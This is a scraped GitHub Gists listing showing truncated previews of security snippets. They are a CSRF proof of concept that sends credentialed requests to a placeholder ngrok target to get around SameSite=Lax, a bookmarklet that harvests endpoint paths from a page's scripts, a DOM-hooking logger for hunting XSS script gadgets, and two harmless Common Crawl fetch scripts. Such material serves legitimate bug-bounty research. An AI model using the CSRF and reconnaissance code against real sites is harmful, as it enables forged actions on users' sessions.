Skip to content

Instantly share code, notes, and snippets.

View electro0nes's full-sized avatar
💭
Security

Moein Erfanian electro0nes

💭
Security
View GitHub Profile
@JorianWoltjer
JorianWoltjer / csrf_multiple_forms.html
Last active July 11, 2025 22:09
PoC's for CSRF multiple SameSite=Lax requests (https://x.com/J0R1AN/status/1842139861295169836)
<body></body>
<script>
(async () => {
const target = "https://XXX.ngrok-free.app";
// Warmup
await fetch(target, {
mode: "no-cors",
credentials: "include",
});
javascript: (function() {
var scripts = document.getElementsByTagName("script"),
regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;
const results = new Set;
for (var i = 0; i < scripts.length; i++) {
var t = scripts[i].src;
"" != t && fetch(t).then(function(t) {
return t.text()
}).then(function(t) {
var e = t.matchAll(regex);
@fransr
fransr / logger.js
Last active July 17, 2025 13:47
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
var logger = console.trace;
// ELEMENT
;(getElementByIdCopy => {
Element.prototype.getElementById = function(q) {
logger('getElementById', q, this, this.innerHTML);
return Reflect.apply(getElementByIdCopy, this, [q])
}
})(Element.prototype.getElementById)
@Smerity
Smerity / fetch_page.py
Created August 7, 2015 21:30
An example of fetching a page from Common Crawl using the Common Crawl Index
import gzip
import json
import requests
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
# Let's fetch the Common Crawl FAQ using the CC index
resp = requests.get('http://index.commoncrawl.org/CC-MAIN-2015-27-index?url=http%3A%2F%2Fcommoncrawl.org%2Ffaqs%2F&output=json')
@Smerity
Smerity / get_all_urls.py
Created June 23, 2015 01:05
Collect all URLs for NYTimes in the Common Crawl URL Index
import requests
show_pages = 'http://index.commoncrawl.org/CC-MAIN-2015-18-index?url={query}&output=json&showNumPages=true'
get_page = 'http://index.commoncrawl.org/CC-MAIN-2015-18-index?url={query}&output=json&page={page}'
query = 'nytimes.com/*'
show = requests.get(show_pages.format(query=query))
pages = show.json()['pages']
results = set()